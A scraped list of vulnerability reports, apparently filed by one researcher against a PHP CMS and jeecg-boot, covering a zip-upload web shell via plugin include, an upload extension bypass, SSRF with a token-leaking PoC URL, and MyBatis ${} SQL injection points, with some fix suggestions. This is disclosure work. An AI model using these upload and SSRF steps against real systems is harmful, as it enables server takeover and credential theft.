azraelxuemo
azraelxuemo
我们创建一个目录,里面有config.json 内容为{ "data_id":"12", "name":"aaa" } 一定要保证有data_id,name字段,内容随意 然后随便弄一个index.php,写上web shell,打包成zip 这里config.json是用来把$config,和$data_id赋值,这样在能做到写的效果 这里我们最后上传的zip会直接写到public/index.php 修复建议: 只上传后缀为html的文件
这里我选用的是最新的2.3.0的cms  编写测试php代码,打包成zip  进入后台,选择网站管理->支付方式,上传对应的zip   漏洞点在于这里的GetPaymentConfig  GetpaymentConfig里的class_exists会去尝试寻找文件,然后会进入load_class,Findfile会找到对应的上传文件,这里相当于是把临时文件先cp到extend目录下,然后会自动include  这里如果我们没有按照要求写插件,会报错,然后删除文件,  ,但由于include的原因,我们的代码也被执行了 这里会报错,然后显示代码执行的结果 
There are a lot of file upload problems in the past,and you fix some The exclude_ext is only php,so we can upload other ext to bypass Such as phar phtml.....
[jeecg-boot漏洞.pdf](https://github.com/jeecgboot/jeecg-boot/files/9858362/jeecg-boot.pdf)
# SysDictMapper.xml queryDictTablePageList。You can see that no precompiling is performed # SysDictController.java # SysDictServiceImpl.java # vuln There is no control over the user's control over the table, column, and database...
# CommonController.java As you can see, the user can directly control the parameters without any check # poc http://192.168.1.1:8088/jeecg-boot/sys/common/transitRESTful?url=http://192.168.1.132:10001 The request here will bring out the token # vuln So...
java提供了原生的预编译sql语句,这样可以防止sql注入问题 # queryListWithPermission 下图没有进行预编译处理,建议换成#{},虽然项目现在没有使用这条语句,但不排除以后的可能,建议修复 # updateNullByEmptyString 下图也使用的是${} 但实际上是写死的,但为了安全考虑,建议也换乘#{} # selectLogicDeleted 这里也建议换乘#{} # queryFilterTableDictInfo # queryTableDictItemsByCodeAndFilter # queryTableDictTextByKey # queryTreeList # queryTableDictWithFilter # queryAllTableDictItems # queryTableDictByKeysAndFilterSql
# sysUserMapper.xml deleteLogicDeleted. You can see that no precompiling is performed # SysUserController.java # SysUserServiceImpl.java So Users can pass in malicious parameters through http requests to achieve SQL injection #...
# sysUserMapper.xml revertLogicDeleted. You can see that no precompiling is performed # SysUserController.java # SysUserServiceImpl.java So Users can pass in malicious parameters through http requests to achieve SQL injection #...